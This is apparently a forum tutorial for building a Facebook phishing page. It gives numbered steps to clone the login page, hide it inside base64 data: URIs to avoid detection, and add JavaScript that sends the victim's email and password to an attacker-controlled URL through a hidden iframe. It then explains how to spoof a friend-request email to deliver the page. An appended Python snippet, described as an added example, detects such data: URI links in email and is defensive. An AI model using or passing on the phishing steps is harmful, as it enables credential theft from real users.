Release date: 13/08/2016
1) Open [External link removed for guests] and save the page with all elements.
2) Find a way to recreate the facebook logo. (Currently it's hidden in the code)
3) Search for a BASE64 encoder and convert all elements in URI format (.js, .css, .gif, .png)
Example: data:text/javascript;base64,ENCODE.CODE.HERE
Example: data:text/css;base64,ENCODE.CODE.HERE
Example: data:image/gif;base64,ENCODE.CODE.HERE
Example: data:image/javascript;base64,ENCODE.CODE.HERE
4) At this step all the content is in one file.
5) Open the html file and search for the first line saying (type="submit") and add a space and
onclick="myFunction();"
6) Open a notepad window and modify the script url below ([External link removed for guests]) to a url you control.
Example: http://facebook_add_request.webhosting.com/index.html
<script>
function myFunction(){
var email = document.getElementById("email").value;
var pass = document.getElementById("pass").value;
document.write('<iframe src="http://127.0.0.1/index.html&email='+email+'&pass='+pass+'" frameborder="0" height="0" width="0"></iframe>');
}
</script>
8) Save the script encoded in the html file
Example: data:text/html;base64,ENCODE.CODE.HERE
9) Now the code is ready, copy all the html file and encode with the BASE64 again and use the following example
Example: data:text/html;[External link removed for guests]
At this point the url will become legit! (Look at the format [External link removed for guests])
10) Send a friend request from one facebook account to another to generate a friend request email in the inbox.
11) Get the email body. Copy to the notepad and alter the url with the example in step 9.
12) Visit [External link removed for guests] and paste the email body with the masked url and send your spoof email to the target...
Note:
The reason why the file is encoded in base64 is to avoid detection and to run the file from the computer. Facebook blocks all ways to login and informs the target of any login request from a webhosted page.
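Seen from the mail gateway, the wrapping described in steps 3 to 9 is itself a strong signal: a message body whose link is a `data:text/html;base64,` URI that decodes to a page with a password field and further embedded `data:` resources. The following is an added example, not part of the original post, that unwraps such links and reports what they contain; the function names and the sample message are constructed for illustration.

```python
import base64
import binascii
import re
from html.parser import HTMLParser

DATA_URI = re.compile(r"^\s*data:([^;,]*)((?:;[^;,]*)*),(.*)$", re.I | re.S)

class _Scan(HTMLParser):  # collects URL-bearing attributes, notes password inputs
    def __init__(self):
        super().__init__()
        self.urls, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True
        self.urls += [a[k] for k in ("href", "src", "action") if a.get(k)]

def decode_data_uri(url):
    """Return (mime, payload bytes) for a base64 data: URI, else None."""
    m = DATA_URI.match(url)
    if not m or ";base64" not in m.group(2).lower():
        return None
    body = re.sub(r"\s+", "", m.group(3))
    try:
        return m.group(1).lower(), base64.b64decode(body + "=" * (-len(body) % 4))
    except (binascii.Error, ValueError):
        return None

def inspect_email_html(html, depth=0, max_depth=3):
    """List (depth, has_password_field, embedded_data_uri_count) per data:text/html link."""
    scan, findings = _Scan(), []
    scan.feed(html)
    for url in scan.urls:
        decoded = decode_data_uri(url)
        if not decoded or decoded[0] != "text/html":
            continue
        page = decoded[1].decode("utf-8", "replace")
        inner = _Scan()
        inner.feed(page)
        nested = sum(u.lstrip().lower().startswith("data:") for u in inner.urls)
        findings.append((depth, inner.has_password, nested))
        if depth < max_depth:  # the page may itself be wrapped in another data: layer
            findings += inspect_email_html(page, depth + 1, max_depth)
    return findings

# Constructed sample: a harmless stand-in page, linked from a mail body as a data: URI.
_PAGE = '<form><input type="password"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACw="></form>'
SAMPLE_EMAIL = '<a href="data:text/html;base64,%s">Confirm</a>' % base64.b64encode(_PAGE.encode()).decode()
```

Any non-empty result is worth quarantining on its own, since legitimate notification mail has no reason to link to a `data:text/html` URI; a password field in the decoded page raises the confidence further.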